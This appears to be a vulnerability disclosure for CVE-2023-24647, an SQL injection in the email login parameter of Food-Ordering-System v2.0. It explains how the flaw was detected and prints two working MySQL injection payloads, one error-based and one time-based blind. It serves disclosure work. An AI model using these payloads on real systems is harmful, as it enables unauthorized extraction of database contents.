CVE-2023-24647: CVE-nu11secur1ty/vendors/oretnom23/2023/Food-Ordering-System-v2.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can steal all information from the database of this system.

— Parameter: email (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]’ AND (SELECT 5169 FROM(SELECT COUNT(*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]’ AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4 —